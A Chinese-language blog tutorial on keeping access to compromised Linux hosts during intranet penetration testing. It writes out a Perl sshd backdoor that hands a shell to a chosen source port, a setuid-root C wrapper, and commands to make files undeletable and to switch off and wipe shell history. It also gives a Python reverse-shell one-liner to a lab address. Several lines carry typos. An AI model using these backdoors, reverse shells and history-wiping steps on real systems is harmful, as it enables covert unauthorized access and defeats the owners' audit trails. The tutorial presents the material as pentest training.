内网渗透-Linux权限维持
Linux权限维持
文章目录
- Linux权限维持
- 前言
- ssh后门
- Setuid and Setgid
- Linux隐藏技术
- 后记
前言
前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。
ssh后门
过滤
ps -elf |grep 12345
监听端口
nc -lvvp 123
查看端口
netstat -anlp|grep 12345
(1)ssh后门(脚本内容)(192.168.231.134)
#!/usr/bin/perl
exec “bin/sh” if (getpeername(STDIN) =~ /^…4A/);
exec {“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,
开启ssh服务,连接ssh(192.168.231.128)
ssh root@191.168.231.134 -p 12345(无需密码即可登录成功)
实验失败
获得shell后,利用python模块获取虚拟终端
python -c ‘import pty;pty.spawn(“/bin/bash”)’
查看登录的来源
w who last
ip addr 查看ip地址
本次实验,脚本没有执行成功,这里就不演示了。
Setuid and Setgid
(2)Setuid and Setgid(以普通权限获取root权限)
C脚本
#include<unistd.h>
void main(int argc,char *argv[])
{
setuid(0);
setgid(0);
if(argc>1)execl("/bin/sh","sh","-c",grgv[1],NULL);
elseexecl("/bin/sh","sh",NULL);
}
在kali编译脚本并执行
gcc back.c -o back
cp back .bin/
chmod u+s /bin/back
编译脚本并生成back文件,复制到bin目录下,赋予读写的权限
查看权限
ll /bin/back
执行命令
back whoami
back
whoami
root
执行成功,实验结束。
Linux隐藏技术
chatter +i 1.txt(即使是root权限也删除不了)
chatter -i 1.txt 把特殊的权限给删除了
touch 创建
rm -rf 1.txt 删除
ll 123 查看权限
ls -la 查看权限
拿到shell后,开启无痕模式,禁用命令历史记录功能
set +o history
恢复
set -o history
删除历史命令
删除100行疑惑的操作命令
set -i “1000,$d” .bash_history
反弹shell的网站
webshell.github.io/reverse-shell-generator/
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.231.128”,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
\r后门(隐藏前面的内容)
123\r456
cat 1.txt
456
vim 1.txt
123456
后记
Linux权限维持的内容相对来说比较少,因为没有了组和域的概念,也没有了注册表的概念,所以在内网环境中,公司里主要还是以window渗透为主,所以window中的权限维持的方法有很多,大多是写入注册表中,开机自启运行的。
内网渗透-Linux权限维持相关推荐
- linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结
在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索.Linux也是在内网渗透中很常见的操作 ...
- linux下敏感文件(账号密码)查找—内网渗透linux主机密码收集
目录 find命令 命令格式 按照文件/目录名搜索 linux正则表达式 find同时查找符合多个格式的文件 grep命令 管道符| egrep xargs命令 案例 内网渗透中linux主机查找账号 ...
- 内网渗透-Linux内网渗透
系列文章目录 文章目录 系列文章目录 一.Linux内网渗透 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH ...
- 内网渗透-window权限维持
window权限维持 文章目录 window权限维持 前言 meterpreter权限维持 persistence metsvc 系统工具替换后门 iexplore.exe narrator osk ...
- 内网渗透系列:内网信息搜集方法小结2
目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...
- CVE-2018-8174漏洞复现及内网渗透攻击
文章目录 说明 CVE-2018-8174漏洞简介 Persistence后门 环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口 内网攻击过程 1号机获得2号机的 ...
- 红蓝对抗 linux内网渗透
目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...
- 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)
http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...
- 内网渗透之Linux反弹shell(一)
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...
最新文章
- Linux常用性能检测命令
- Web开发的标准目录结构
- eselasticsearch入门_ElasticSearch入门学习-基础示例(1)
- oracle needs compile,Oracle:为什么在基础视图中的数据更改后,我的MW无效到NEEDS_COMPILE状态...
- div居中与div内容居中,不一样
- Android之父卸任意味着什么?
- Mac 系统和windows 的差别
- hashCode() 和equals() 区别和作用
- Mac模拟慢速网络 - Network Link Conditioner 安装和使用
- 22/100. Find All Anagrams in a String
- 【机器学习】数据挖掘算法——关联规则(一),相关概念,评价指标
- java调C接口_java通过jni调用C程序接口
- mongdb安装配置
- 使用devops的团队_DevOps团队的3种指标仪表板
- 2022百度人工智能专利白皮书 附下载
- ORCAD原理图检查
- CString 使用详解
- 服务器上Kafka启动报错:error=‘Cannot allocate memory‘ (errno=12)
- python基础操作笔记
- MATLAB调用Origin绘图官方案例学习
热门文章
- 不要迷恋哥本哈根达斯
- 两数之差的补码等于被减数的补码与减数相反数的补码。_二进制的原码、反码、补码...
- python爬虫百度安全验证_爬虫黑科技-绕开百度人机验证
- java-net-php-python-jsp家具进销存管理系统1计算机毕业设计程序
- springboot项目添加了logback-spring.xml配置文件不生效
- 坦克对战游戏 AI 设计
- Java|Joda-Time简化时间处理利器
- 第二证券|小鹏持续萎靡,理想蔚来逆势反弹破月销记录
- @Value的诸多用法
- UVM实战 卷I学习笔记10——UVM中的寄存器模型(3)